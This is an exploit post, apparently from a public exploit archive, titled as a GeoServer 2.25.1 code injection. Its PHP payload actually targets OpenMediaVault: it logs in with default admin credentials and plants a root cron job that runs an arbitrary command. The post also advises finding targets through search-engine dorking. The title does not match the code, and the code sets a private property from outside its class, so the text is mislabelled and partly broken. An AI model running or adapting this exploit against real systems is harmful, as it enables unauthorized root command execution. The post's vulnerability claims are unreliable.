=============================================================================================================================================
| # Title     : GeoServer 2.25.1 Code Injection Vulnerability                                                                               |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |
| # Vendor    : https://github.com/geoserver/                                                                                               |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 118 set your target .

[+] Line 123  set your command to execute.

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class OpenMediaVaultExploit
{
    private $targetUri;
    private $username;
    private $password;
    private $persistent;
    private $cronUuid;
    private $versionNumber;

    public function __construct($targetUri, $username, $password, $persistent = false)
    {
        $this->targetUri = $targetUri;
        $this->username = $username;
        $this->password = $password;
        $this->persistent = $persistent;
    }

    private function sendRequest($url, $data)
    {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
        curl_setopt($ch, CURLOPT_HTTPHEADER, [
            'Content-Type: application/json'
        ]);
        $response = curl_exec($ch);
        curl_close($ch);

        return json_decode($response, true);
    }

    public function login()
    {
        echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n";

        $data = [
            'service' => 'Session',
            'method' => 'login',
            'params' => [
                'username' => $this->username,
                'password' => $this->password
            ],
            'options' => null
        ];

        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
        return isset($response['authenticated']) && $response['authenticated'] === true;
    }

    public function checkTarget()
    {
        echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n";

        $data = [
            'service' => 'System',
            'method' => 'getInformation',
            'params' => null
        ];

        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
        return $response;
    }

    public function checkVersion($response)
    {
        if (!empty($response)) {
            $version = $response['response']['version'] ?? null;
            return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null;
        }
        return null;
    }

    public function executeCommand($cmd)
    {
        echo "Executing command...\n";

        $schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*';
        $uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4';

        $data = [
            'service' => 'Cron',
            'method' => 'set',
            'params' => [
                'uuid' => $uuid,
                'enable' => true,
                'execution' => 'exactly',
                'minute' => $schedule,
                'hour' => $schedule,
                'dayofmonth' => $schedule,
                'month' => $schedule,
                'dayofweek' => $schedule,
                'username' => 'root',
                'command' => $cmd,
                'sendemail' => false,
                'comment' => '',
                'type' => 'userdefined'
            ],
            'options' => null
        ];

        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
        $this->cronUuid = $response['response']['uuid'] ?? '';
        $this->applyConfigChanges();
        echo "Cron payload execution triggered.\n";
    }

    public function applyConfigChanges()
    {
        $data = [
            'service' => 'Config',
            'method' => 'applyChangesBg',
            'params' => [
                'modules' => [],
                'force' => false
            ],
            'options' => null
        ];

        $this->sendRequest($this->targetUri . '/rpc.php', $data);
    }

    public function removePayload()
    {
        if (!$this->persistent) {
            $data = [
                'service' => 'Cron',
                'method' => 'delete',
                'params' => [
                    'uuid' => $this->cronUuid
                ]
            ];

            $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
            if ($response) {
                $this->applyConfigChanges();
                echo "Cron payload entry successfully removed.\n";
            } else {
                echo "Cannot access cron services to remove payload.\n";
            }
        }
    }
}

// Usage
$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);
if ($exploit->login()) {
    $response = $exploit->checkTarget();
    if ($response) {
        $exploit->versionNumber = $exploit->checkVersion($response);
        $exploit->executeCommand('your-command-here');
        $exploit->removePayload();
    }
}

?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================